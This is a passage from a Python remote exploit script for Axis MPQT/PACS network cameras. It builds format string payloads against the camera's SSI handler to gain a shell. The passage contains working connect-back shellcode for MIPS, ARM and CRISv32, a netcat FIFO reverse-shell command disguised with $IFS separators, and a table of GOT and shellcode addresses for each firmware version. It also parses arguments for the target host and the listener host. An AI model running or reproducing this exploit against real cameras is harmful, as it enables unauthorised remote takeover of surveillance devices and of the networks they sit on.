self.Add(str(ADDR))\r\n self.Add('$n')\r\n \r\n # 'New Style' Half word (2 bytes)\r\n def AddDirectParameterHN(self, ADDR):\r\n self.Add('%')\r\n self.Add(str(ADDR))\r\n self.Add('$hn')\r\n \r\n # 'New Style' One Byte (1 byte)\r\n def 
AddDirectParameterHHN(self, ADDR):\r\n self.Add('%')\r\n self.Add(str(ADDR))\r\n self.Add('$hhn')\r\n \r\n # Addressing\r\n def AddADDR(self, ADDR):\r\n self.Add('%')\r\n self.Add(str(ADDR))\r\n self.Add('u')\r\n \r\n # 'Old Style' POP\r\n def AddPOP(self, size):\r\n if size != 0:\r\n self.Add(self.POP * size)\r\n \r\n # Normally only one will be sent, multiple is good to quick-check for any FMS\r\n #\r\n # 'Old Style' Double word (8 bytes)\r\n def AddWRITElln(self, size):\r\n self.Add(self.WRITElln * size)\r\n \r\n # 'Old Style' Word (4 bytes)\r\n def AddWRITEn(self, size):\r\n self.Add(self.WRITEn * size)\r\n \r\n # 'Old Style' Half word (2 bytes)\r\n def AddWRITEhn(self, size):\r\n self.Add(self.WRITEhn * size)\r\n \r\n # 'Old Style' One byte (1 byte)\r\n def AddWRITEhhn(self, size):\r\n self.Add(self.WRITEhhn * size)\r\n \r\n # Return the whole FMS string\r\n def FMSbuild(self):\r\n return self.fmscode\r\n \r\nclass HTTPconnect:\r\n \r\n def __init__(self, host, proto, verbose, creds, noexploit):\r\n self.host = host\r\n self.proto = proto\r\n self.verbose = verbose\r\n self.credentials = creds\r\n self.noexploit = noexploit\r\n \r\n # Netcat remote connectback shell needs to have raw HTTP connection as we using special characters as '\\t','$','`' etc..\r\n def RAW(self, uri):\r\n # Connect-timeout in seconds\r\n timeout = 5\r\n socket.setdefaulttimeout(timeout)\r\n \r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n tmp = self.host.split(':')\r\n HOST = tmp[0]\r\n PORT = int(tmp[1])\r\n if self.verbose:\r\n print \"[Verbose] Sending to:\", HOST\r\n print \"[Verbose] Port:\", PORT\r\n print \"[Verbose] URI:\",uri\r\n s.connect((HOST, PORT))\r\n s.send(\"GET %s HTTP/1.0\\r\\n\\r\\n\" % uri)\r\n html = (s.recv(4096)) # We really do not care whats coming back\r\n# if html:\r\n# print \"[i] Received:\",html\r\n s.shutdown(3)\r\n s.close()\r\n return html\r\n \r\n \r\n def Send(self, uri):\r\n 
\r\n # The SSI daemon are looking for this, and opens a new FD (5), but this does'nt actually\r\n # matter for the functionality of this exploit, only for future references.\r\n headers = { \r\n 'User-Agent' : 'MSIE',\r\n }\r\n \r\n # Connect-timeout in seconds\r\n timeout = 5\r\n socket.setdefaulttimeout(timeout)\r\n \r\n url = '%s://%s%s' % (self.proto, self.host, uri)\r\n \r\n if self.verbose:\r\n print \"[Verbose] Sending:\", url\r\n \r\n if self.proto == 'https':\r\n if hasattr(ssl, '_create_unverified_context'):\r\n print \"[i] Creating SSL Default Context\"\r\n ssl._create_default_https_context = ssl._create_unverified_context\r\n \r\n if self.credentials:\r\n Basic_Auth = self.credentials.split(':')\r\n if self.verbose:\r\n print \"[Verbose] User:\",Basic_Auth[0],\"Password:\",Basic_Auth[1]\r\n try:\r\n pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()\r\n pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])\r\n auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)\r\n opener = urllib2.build_opener(auth_handler)\r\n urllib2.install_opener(opener)\r\n except Exception as e:\r\n print \"[!] 
Basic Auth Error:\",e\r\n sys.exit(1)\r\n \r\n if self.noexploit and not self.verbose:\r\n print \"[<] 204 Not Sending!\"\r\n html = \"Not sending any data\"\r\n else:\r\n data = None\r\n req = urllib2.Request(url, data, headers)\r\n rsp = urllib2.urlopen(req)\r\n if rsp:\r\n print \"[<] %s OK\" % rsp.code\r\n html = rsp.read()\r\n return html\r\n \r\n \r\nclass shellcode_db:\r\n \r\n def __init__(self,targetIP,verbose):\r\n self.targetIP = targetIP\r\n self.verbose = verbose\r\n \r\n def sc(self,target):\r\n self.target = target\r\n \r\n \r\n# Connect back shellcode\r\n#\r\n# CRISv32: Written by myself, no shellcode availible out on \"The Internet\"\r\n# NCSH: My PoC of netcat FIFO / PIPE reverese shell, w/o '-e' option and with $IFS as separators\r\n# MIPSel: Written by Jacob Holcomb (url encoded by me)\r\n# ARM: http://shell-storm.org/shellcode/files/shellcode-754.php\r\n#\r\n # Slightly modified syscall's\r\n MIPSel = string.join([\r\n #close stdin\r\n \"%ff%ff%04%28\" #slti a0,zero,-1\r\n \"%a6%0f%02%24\" #li v0,4006\r\n \"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n #close stdout\r\n \"%11%11%04%28\" #slti a0,zero,4369\r\n \"%a6%0f%02%24\" #li v0,4006\r\n \"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n #close stderr\r\n \"%fd%ff%0c%24\" #li t4,-3\r\n \"%27%20%80%01\" #nor a0,t4,zero\r\n \"%a6%0f%02%24\" #li v0,4006\r\n \"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n # socket AF_INET (2)\r\n \"%fd%ff%0c%24\" #li t4,-3\r\n \"%27%20%80%01\" #nor a0,t4,zero\r\n \"%27%28%80%01\" #nor a1,t4,zero\r\n \"%ff%ff%06%28\" #slti a2,zero,-1\r\n \"%57%10%02%24\" #li v0,4183\r\n \"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n #\r\n \"%ff%ff%44%30\" # andi $a0, $v0, 0xFFFF\r\n #\r\n # dup2 stdout\r\n \"%c9%0f%02%24\" #li v0,4041\r\n \"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n #\r\n # dup2 stderr\r\n \"%c9%0f%02%24\" #li v0,4041\r\n \"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n #\r\n # Port\r\n \"PP1PP0%05%3c\"\r\n \"%01%ff%a5%34\"\r\n #\r\n \"%01%01%a5%20\" #addi a1,a1,257\r\n \"%f8%ff%a5%af\" #sw a1,-8(sp)\r\n #\r\n # IP\r\n 
\"IP3IP4%05%3c\"\r\n \"IP1IP2%a5%34\"\r\n #\r\n \"%fc%ff%a5%af\" #sw a1,-4(sp)\r\n \"%f8%ff%a5%23\" #addi a1,sp,-8\r\n \"%ef%ff%0c%24\" #li t4,-17\r\n \"%27%30%80%01\" #nor a2,t4,zero\r\n \"%4a%10%02%24\" #li v0,4170\r\n \"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n #\r\n \"%62%69%08%3c\" #lui t0,0x6962\r\n \"%2f%2f%08%35\" #ori t0,t0,0x2f2f\r\n \"%ec%ff%a8%af\" #sw t0,-20(sp)\r\n \"%73%68%08%3c\" #lui t0,0x6873\r\n \"%6e%2f%08%35\" #ori t0,t0,0x2f6e\r\n \"%f0%ff%a8%af\" #sw t0,-16(sp\r\n \"%ff%ff%07%28\" #slti a3,zero,-1\r\n \"%f4%ff%a7%af\" #sw a3,-12(sp)\r\n \"%fc%ff%a7%af\" #sw a3,-4(sp\r\n \"%ec%ff%a4%23\" #addi a0,sp,-20\r\n \"%ec%ff%a8%23\" #addi t0,sp,-20\r\n \"%f8%ff%a8%af\" #sw t0,-8(sp)\r\n \"%f8%ff%a5%23\" #addi a1,sp,-8\r\n \"%ec%ff%bd%27\" #addiu sp,sp,-20\r\n \"%ff%ff%06%28\" #slti a2,zero,-1\r\n \"%ab%0f%02%24\" #li v0,4011 (execve)\r\n \"%4c%f7%f7%03\" #syscall 0xdfdfd\r\n ], '') \r\n \r\n # Working netcat shell\r\n # - $PATH will locate 'mkfifo', 'nc' and 'rm'\r\n # - LHOST / LPORT will be changed on the fly later in the code\r\n # - 1) make FIFO, 2) netcat back to attacker with STDIN to /bin/sh, and PIPE STDOUT back to the remote via FIFO, 3) remove FIFO when exiting\r\n # - $IFS = <space><tab><newline> [By default, and we need <space> or <tab> as separator]\r\n # $ echo -n \"$IFS\" | hexdump -C\r\n # 00000000 20 09 0a\r\n # - $PS1 = $ [By default, and we need something to \"comment\" out our trailing FMS code from /bin/sh -c]\r\n #\r\n # '2>/tmp/s' (STDERR > FIFO) Don't work with $IFS as separator\r\n #\r\n # Working with Apache and Boa\r\n# NCSH = \"mkfifo$IFS/tmp/s;nc$IFS-w$IFS\\\"5\\\"$IFS\\\"LHOST\\\"$IFS\\\"LPORT\\\"$IFS0</tmp/s|/bin/sh>/tmp/s\\\"$IFS\\\"2>/tmp/s;rm$IFS/tmp/s;$PS1\"\r\n NCSH = \"mkfifo$IFS/tmp/s;nc$IFS-w$IFS\\\"5\\\"$IFS\\\"LHOST\\\"$IFS\\\"LPORT\\\"$IFS0</tmp/s|/bin/sh>/tmp/s;rm$IFS/tmp/s;$PS1\"\r\n \r\n ARMel = string.join([\r\n # original: http://shell-storm.org/shellcode/files/shellcode-754.php\r\n # 32-bit instructions, enter 
thumb mode\r\n \"%01%10%8f%e2\" # add r1, pc, #1\r\n \"%11%ff%2f%e1\" # bx r1\r\n \r\n # 16-bit thumb instructions follow\r\n #\r\n # socket(2, 1, 0)\r\n \"%02%20\" #mov r0, #2\r\n \"%01%21\" #mov r1, #1\r\n \"%92%1a\" #sub r2, r2, r2\r\n \"%0f%02\" #lsl r7, r1, #8\r\n \"%19%37\" #add r7, r7, #25\r\n \"%01%df\" #svc 1\r\n #\r\n # connect(r0, &addr, 16)\r\n \"%06%1c\" #mov r6, r0\r\n \"%08%a1\" #add r1, pc, #32\r\n \"%10%22\" #mov r2, #16\r\n \"%02%37\" #add r7, #2\r\n \"%01%df\" #svc 1\r\n #\r\n # dup2(r0, 0/1/2)\r\n \"%3f%27\" #mov r7, #63\r\n \"%02%21\" #mov r1, #2\r\n #\r\n #lb:\r\n \"%30%1c\" #mov r0, r6\r\n \"%01%df\" #svc 1\r\n \"%01%39\" #sub r1, #1\r\n \"%fb%d5\" #bpl lb\r\n #\r\n # execve(\"/bin/sh\", [\"/bin/sh\", 0], 0)\r\n \"%05%a0\" #add r0, pc, #20\r\n \"%92%1a\" #sub r2, r2, r2\r\n \"%05%b4\" #push {r0, r2}\r\n \"%69%46\" #mov r1, sp\r\n \"%0b%27\" #mov r7, #11\r\n \"%01%df\" #svc 1\r\n #\r\n \"%c0%46\" # .align 2 (NOP)\r\n \"%02%00\" # .short 0x2 (struct sockaddr)\r\n \"PP1PP0\" # .short 0x3412 (port: 0x1234)\r\n \"IP1IP2IP3IP4\" #.byte 192,168,57,1 (ip: 192.168.57.1)\r\n # .ascii \"/bin/sh\\0\\0\"\r\n \"%2f%62%69%6e\" # /bin\r\n \"%2f%73%68%00%00\" # /sh\\x00\\x00\r\n \"%00%00%00%00\"\r\n \"%c0%46\"\r\n ], '') \r\n \r\n \r\n # Connect-back shell for Axis CRISv32\r\n # Written by mcw noemail eu 2016\r\n #\r\n CRISv32 = string.join([\r\n #close(0)\r\n \"%7a%86\" # clear.d r10 \r\n \"%5f%9c%06%00\" # movu.w 0x6,r9\r\n \"%3d%e9\" # break 13\r\n #close(1)\r\n \"%41%a2\" # moveq 1,r10\r\n \"%5f%9c%06%00\" # movu.w 0x6,r9\r\n \"%3d%e9\" # break 13\r\n #close(2)\r\n \"%42%a2\" # moveq 2,r10\r\n \"%5f%9c%06%00\" # movu.w 0x6,r9\r\n \"%3d%e9\" # break 13\r\n #\r\n \"%10%e1\" # addoq 16,sp,acr\r\n \"%42%92\" # moveq 2,r9\r\n \"%df%9b\" # move.w r9,[acr]\r\n \"%10%e1\" # addoq 16,sp,acr\r\n \"%02%f2\" # addq 2,acr\r\n #PORT\r\n \"%5f%9ePP1PP0\" # move.w 0xPP1PP0,r9 #\r\n \"%df%9b\" # move.w r9,[acr]\r\n \"%10%e1\" # addoq 16,sp,acr\r\n \"%6f%96\" # move.d 
acr,r9\r\n \"%04%92\" # addq 4,r9\r\n #IP\r\n \"%6f%feIP1IP2IP3IP4\" # move.d IP4IP3IP2IP1,acr\r\n \"%e9%fb\" # move.d acr,[r9]\r\n #\r\n #socket()\r\n \"%42%a2\" # moveq 2,r10\r\n \"%41%b2\" # moveq 1,r11\r\n \"%7c%86\" # clear.d r12\r\n \"%6e%96\" # move.d $sp,$r9\r\n \"%e9%af\" # move.d $r10,[$r9+]\r\n \"%e9%bf\" # move.d $r11,[$r9+]\r\n \"%e9%cf\" # move.d $r12,[$r9+]\r\n \"%41%a2\" # moveq 1,$r10\r\n \"%6e%b6\" # move.d $sp,$r11\r\n \"%5f%9c%66%00\" # movu.w 0x66,$r9\r\n \"%3d%e9\" # break 13\r\n #\r\n \"%6a%96\" # move.d $r10,$r9\r\n \"%0c%e1\" # addoq 12,$sp,$acr\r\n \"%ef%9b\" # move.d $r9,[$acr]\r\n \"%0c%e1\" # addoq 12,$sp,$acr\r\n \"%6e%96\" # move.d $sp,$r9\r\n \"%10%92\" # addq 16,$r9\r\n \"%6f%aa\" # move.d [$acr],$r10\r\n \"%69%b6\" # move.d $r9,$r11\r\n \"%50%c2\" # moveq 16,$r12\r\n #\r\n # connect()\r\n \"%6e%96\" # move.d $sp,$r9\r\n \"%e9%af\" # move.d $r10,[$r9+]\r\n \"%e9%bf\" # move.d $r11,[$r9+]\r\n \"%e9%cf\" # move.d $r12,[$r9+]\r\n \"%43%a2\" # moveq 3,$r10\r\n \"%6e%b6\" # move.d $sp,$r11\r\n \"%5f%9c%66%00\" # movu.w 0x66,$r9 \r\n \"%3d%e9\" # break 13\r\n # dup(0) already in socket\r\n #dup(1)\r\n \"%6f%aa\" # move.d [$acr],$r10\r\n \"%41%b2\" # moveq 1,$r11\r\n \"%5f%9c%3f%00\" # movu.w 0x3f,$r9\r\n \"%3d%e9\" # break 13\r\n #\r\n #dup(2)\r\n \"%6f%aa\" # move.d [$acr],$r10\r\n \"%42%b2\" # moveq 2,$r11\r\n \"%5f%9c%3f%00\" # movu.w 0x3f,$r9\r\n \"%3d%e9\" # break 13\r\n #\r\n #execve(\"/bin/sh\",NULL,NULL)\r\n \"%90%e2\" # subq 16,$sp\r\n \"%6e%96\" # move.d $sp,$r9\r\n \"%6e%a6\" # move.d $sp,$10\r\n \"%6f%0e%2f%2f%62%69\" # move.d 69622f2f,$r0\r\n \"%e9%0b\" # move.d $r0,[$r9]\r\n \"%04%92\" # addq 4,$r9\r\n \"%6f%0e%6e%2f%73%68\" # move.d 68732f6e,$r0\r\n \"%e9%0b\" # move.d $r0,[$r9]\r\n \"%04%92\" # addq 4,$r9\r\n \"%79%8a\" # clear.d [$r9]\r\n \"%04%92\" # addq 4,$r9\r\n \"%79%8a\" # clear.d [$r9]\r\n \"%04%92\" # addq 4,$r9\r\n \"%e9%ab\" # move.d $r10,[$r9]\r\n \"%04%92\" # addq 4,$r9\r\n \"%79%8a\" # clear.d [$r9]\r\n 
\"%10%e2\" # addq 16,$sp\r\n \"%6e%f6\" # move.d $sp,$acr\r\n \"%6e%96\" # move.d $sp,$r9\r\n \"%6e%b6\" # move.d $sp,$r11\r\n \"%7c%86\" # clear.d $r12\r\n \"%4b%92\" # moveq 11,$r9\r\n \"%3d%e9\" # break 13\r\n ], '') \r\n \r\n \r\n if self.target == 'MIPSel':\r\n return MIPSel\r\n elif self.target == 'ARMel':\r\n return ARMel\r\n elif self.target == 'CRISv32':\r\n return CRISv32\r\n elif self.target == 'NCSH1':\r\n return NCSH\r\n elif self.target == 'NCSH2':\r\n return NCSH\r\n else:\r\n print \"[!] Unknown shellcode! (%s)\" % str(self.target)\r\n sys.exit(1)\r\n \r\n \r\nclass FMSdb:\r\n \r\n def __init__(self,targetIP,verbose):\r\n self.targetIP = targetIP\r\n self.verbose = verbose\r\n \r\n def FMSkey(self,target):\r\n self.target = target\r\n \r\n target_db = {\r\n \r\n#-----------------------------------------------------------------------\r\n# All pointing from free() GOT to shellcode on .bss (Except ARM with NCSH)\r\n#-----------------------------------------------------------------------\r\n \r\n#\r\n# Using POP format string, AKA 'Old Style'\r\n#\r\n # MPQT\r\n 'MIPS-5.85.x': [\r\n 0x41f370, # Adjust to GOT free() address\r\n 0x420900, # .bss shellcode address\r\n 2, # 1st POP's\r\n 2, # 2nd POP's\r\n 'axi', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-5.40.3': [\r\n 0x41e41c, # Adjust to GOT free() address\r\n 0x4208cc, # .bss shellcode address\r\n 7, # 1st POP's\r\n 11, # 2nd POP's\r\n 'ax', # Aligns injected code\r\n 450, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-5.4x': [ \r\n 0x41e4cc, # Adjust to GOT free() address\r\n 0x42097c, # .bss shellcode address\r\n 7, # 1st POP's\r\n 11, # 2nd POP's\r\n 'ax', # Aligns injected code\r\n 450, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-5.5x': [\r\n 0x41d11c, # Adjust to GOT free() address\r\n 0x41f728, # .bss shellcode 
address\r\n 5, # 1st POP's\r\n 15, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-5.55x': [ \r\n 0x41d11c, # Adjust to GOT free() address\r\n 0x41f728, # .bss shellcode address\r\n 11, # 1st POP's\r\n 9, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # Shared with MPQT and PACS\r\n 'MIPS-5.6x': [ \r\n 0x41d048, # Adjust to GOT free() address\r\n 0x41f728, # .bss shellcode address\r\n 5, # 1st POP's\r\n 15, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n \r\n ],\r\n \r\n # MPQT\r\n 'MIPS-5.7x': [ \r\n 0x41d04c, # Adjust to GOT free() address\r\n 0x41f718, # .bss shellcode address\r\n 2, # 1st POP's\r\n 14, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-5.75x': [\r\n 0x41c498, # Adjust to GOT free() address\r\n 0x41daf0, # .bss shellcode address\r\n 3, # 1st POP's\r\n 13, # 2nd POP's\r\n 'axi', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # Shared with MPQT and PACS\r\n 'MIPS-5.8x': [\r\n 0x41d0c0, # Adjust to GOT free() address\r\n 0x41e740, # .bss shellcode address\r\n 3, # 1st POP's\r\n 13, # 2nd POP's\r\n 'axi', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-5.9x': [ \r\n 0x41d0c0, # Adjust to GOT free() address\r\n 0x41e750, # .bss shellcode address\r\n 3, # 1st POP's\r\n 13, # 2nd POP's\r\n 'axi', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-6.1x': [\r\n 0x41c480, # Adjust to GOT free() address\r\n 0x41dac0, # .bss shellcode address\r\n 3, # 1st POP's\r\n 13, # 
2nd POP's\r\n 'axi', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-6.2x': [\r\n 0x41e578, # Adjust to GOT free() address\r\n 0x41fae0, # .bss shellcode address\r\n 2, # 1st POP's\r\n 2, # 2nd POP's\r\n 'axi', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # MPQT\r\n 'MIPS-6.20x': [\r\n 0x41d0c4, # Adjust to GOT free() address\r\n 0x41e700, # .bss shellcode address\r\n 3, # 1st POP's\r\n 13, # 2nd POP's\r\n 'axi', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # PACS\r\n 'MIPS-1.3x': [\r\n 0x41e4cc, # Adjust to GOT free() address\r\n 0x420a78, # .bss shellcode address\r\n 7, # 1st POP's\r\n 11, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n # PACS\r\n 'MIPS-1.1x': [\r\n 0x41e268, # Adjust to GOT free() address\r\n 0x420818, # .bss shellcode address\r\n 7, # 1st POP's\r\n 11, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'MIPSel' # Shellcode type\r\n ],\r\n \r\n#\r\n# Tested with execstack to set executable stack flag bit on bin's and lib's\r\n#\r\n# These two 'Old Style' are not used in the exploit, but kept here as reference as they has been confirmed working.\r\n#\r\n \r\n # ARMel with bin/libs executable stack flag set with 'execstack'\r\n # MPQT\r\n 'ARM-5.50x': [ # \r\n 0x1c1b4, # Adjust to GOT free() address\r\n 0x1e7c8, # .bss shellcode address\r\n 93, # 1st POP's\r\n 1, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 700, # How big buffer before shellcode\r\n 'ARMel' # Shellcode type (ARMel)\r\n ],\r\n \r\n # ARMel with bin/libs executable stack flag set with 'execstack'\r\n # MPQT\r\n 'ARM-5.55x': [ # \r\n 0x1c15c, # Adjust to GOT free() address\r\n 0x1e834, # .bss shellcode address\r\n 59, # 1st POP's\r\n 80, 
# 2nd POP's\r\n 'axis', # Aligns injected code\r\n 800, # How big buffer before shellcode\r\n 'ARMel' # Shellcode type (ARMel)\r\n ],\r\n \r\n#\r\n# Using direct parameter access format string, AKA 'New Style'\r\n#\r\n # MPQT\r\n 'ARM-NCSH-5.20x': [ # AXIS P1311 5.20 (id=root)\r\n 0x1c1b4, # Adjust to GOT free() address\r\n 0x10178, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 61, # 1st POP's\r\n 115, # 2nd POP's\r\n 143, # 3rd POP's\r\n 118, # 4th POP's\r\n 'NCSH2' # Shellcode type (Netcat Shell)\r\n ],\r\n \r\n # MPQT\r\n 'ARM-NCSH-5.2x': [ # \r\n 0x1c1b4, # Adjust to GOT free() address\r\n 0x1013c, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 61, # 1st POP's\r\n 115, # 2nd POP's\r\n 143, # 3rd POP's\r\n 118, # 4th POP's\r\n 'NCSH2' # Shellcode type (Netcat Shell)\r\n ],\r\n \r\n # MPQT\r\n 'ARM-NCSH-5.4x': [ # \r\n 0x1c1b4, # Adjust to GOT free() address\r\n 0x101fc, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 61, # 1st POP's\r\n 115, # 2nd POP's\r\n 143, # 3rd POP's\r\n 118, # 4th POP's\r\n 'NCSH2' # Shellcode type (Netcat Shell)\r\n ],\r\n#\r\n# Using POP format string, AKA 'Old Style'\r\n#\r\n \r\n # MPQT\r\n 'ARM-NCSH-5.5x': [ # \r\n 0x1c15c, # Adjust to GOT free() address\r\n 0xfdcc, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 97, # 1st POP's\r\n 0, # 2nd POP's\r\n 41, # 3rd POP's\r\n 0, # 4th POP's\r\n 'NCSH1' # Shellcode type (Netcat Shell)\r\n ],\r\n \r\n # MPQT\r\n 'ARM-NCSH-5.6x': [ # \r\n 0x1c15c, # Adjust to GOT free() address\r\n 0xfcec, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 97, # 1st POP's\r\n 0, # 2nd POP's\r\n 41, # 3rd POP's\r\n 0, # 4th POP's\r\n 'NCSH1' # Shellcode type (Netcat Shell)\r\n ],\r\n \r\n # MPQT\r\n 'ARM-NCSH-5.7x': [ # \r\n 0x1c1c0, # Adjust to GOT free() address\r\n 0xf800, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 132, # 1st POP's\r\n 0, # 2nd POP's\r\n 34, # 3rd POP's\r\n 0, # 4th POP's\r\n 'NCSH1' # Shellcode type (Netcat Shell)\r\n 
],\r\n \r\n # Will go in endless loop after exit of nc shell... DoS sux\r\n # MPQT\r\n 'ARM-NCSH-5.8x': [ # \r\n 0x1b39c, # Adjust to GOT free() address\r\n 0xf8c0, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 98, # 1st POP's\r\n 0, # 2nd POP's\r\n 34, # 3rd POP's\r\n 1, # 4th POP's\r\n 'NCSH1' # Shellcode type (Netcat Shell)\r\n ],\r\n \r\n # MPQT\r\n 'ARM-NCSH-6.1x': [ # \r\n 0x1d2a4, # Adjust to GOT free() address\r\n# 0xecc4, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 0xecc8, # Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n 106, # 1st POP's\r\n 0, # 2nd POP's\r\n 34, # 3rd POP's\r\n 1, # 4th POP's\r\n 'NCSH1' # Shellcode type (Netcat Shell)\r\n ],\r\n#\r\n# Using POP format string, AKA 'Old Style'\r\n#\r\n \r\n # MPQT\r\n 'CRISv32-5.5x': [ # \r\n 0x8d148, # Adjust to GOT free() address\r\n 0x8f5a8, # .bss shellcode address\r\n 4, # 1st POP's\r\n 13, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 470, # How big buffer before shellcode\r\n 'CRISv32' # Shellcode type (Crisv32)\r\n ],\r\n \r\n # MPQT\r\n 'CRISv32-5.4x': [ # \r\n 0x8d0e0, # Adjust to GOT free() address\r\n 0x8f542, # .bss shellcode address\r\n 4, # 1st POP's\r\n 13, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 470, # How big buffer before shellcode\r\n 'CRISv32' # Shellcode type (Crisv32)\r\n ],\r\n \r\n # MPQT\r\n 'CRISv32-5.2x': [ # \r\n 0x8d0b4, # Adjust to GOT free() address\r\n 0x8f4d6, # .bss shellcode address\r\n 4, # 1st POP's\r\n 13, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 470, # How big buffer before shellcode\r\n 'CRISv32' # Shellcode type (Crisv32)\r\n ],\r\n \r\n # MPQT\r\n 'CRISv32-5.20.0': [ # \r\n 0x8d0e4, # Adjust to GOT free() address\r\n 0x8f546, # .bss shellcode address\r\n 4, # 1st POP's\r\n 13, # 2nd POP's\r\n 'axis', # Aligns injected code\r\n 470, # How big buffer before shellcode\r\n 'CRISv32' # Shellcode type (Crisv32)\r\n ]\r\n \r\n \r\n }\r\n \r\n if self.target == 0:\r\n return target_db\r\n \r\n if not 
self.target in target_db:\r\n print \"[!] Unknown FMS key: %s!\" % self.target\r\n sys.exit(1)\r\n \r\n if self.verbose:\r\n print \"[Verbose] Number of availible FMS keys:\",len(target_db)\r\n \r\n return target_db\r\n \r\n \r\n#\r\n# Validate correctness of HOST, IP and PORT\r\n#\r\nclass Validate:\r\n \r\n def __init__(self,verbose):\r\n self.verbose = verbose\r\n \r\n # Check if IP is valid\r\n def CheckIP(self,IP):\r\n self.IP = IP\r\n \r\n ip = self.IP.split('.')\r\n if len(ip) != 4:\r\n return False\r\n for tmp in ip:\r\n if not tmp.isdigit():\r\n return False\r\n i = int(tmp)\r\n if i < 0 or i > 255:\r\n return False\r\n return True\r\n \r\n # Check if PORT is valid\r\n def Port(self,PORT):\r\n self.PORT = PORT\r\n \r\n if int(self.PORT) < 1 or int(self.PORT) > 65535:\r\n return False\r\n else:\r\n return True\r\n \r\n # Check if HOST is valid\r\n def Host(self,HOST):\r\n self.HOST = HOST\r\n \r\n try:\r\n # Check valid IP\r\n socket.inet_aton(self.HOST) # Will generate exeption if we try with FQDN or invalid IP\r\n # Or we check again if it is correct typed IP\r\n if self.CheckIP(self.HOST):\r\n return self.HOST\r\n else:\r\n return False\r\n except socket.error as e:\r\n # Else check valid DNS name, and use the IP address\r\n try:\r\n self.HOST = socket.gethostbyname(self.HOST)\r\n return self.HOST\r\n except socket.error as e:\r\n return False\r\n \r\n \r\n \r\nif __name__ == '__main__':\r\n \r\n#\r\n# Help, info and pre-defined values\r\n# \r\n INFO = '[Axis Communications MPQT/PACS remote exploit 2016 bashis <mcw noemail eu>]'\r\n HTTP = \"http\"\r\n HTTPS = \"https\"\r\n proto = HTTP\r\n verbose = False\r\n noexploit = False\r\n lhost = '192.168.0.1' # Default Local HOST\r\n lport = '31337' # Default Local PORT\r\n rhost = '192.168.0.90' # Default Remote HOST\r\n rport = '80' # Default Remote PORT\r\n # Not needed for the SSI exploit, here for possible future usage.\r\n# creds = 'root:pass'\r\n creds = False\r\n \r\n#\r\n# Try to parse all 
arguments\r\n#\r\n try:\r\n arg_parser = argparse.ArgumentParser(\r\n# prog=sys.argv[0],\r\n prog='axis-ssid-PoC.py',\r\n description=('[*]' + INFO + '\\n'))\r\n arg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')\r\n arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']')\r\n arg_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']')\r\n arg_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']')\r\n arg_parser.add_argument('--fms', required=False, help='Manual FMS key')\r\n if creds:\r\n arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']')\r\n arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use 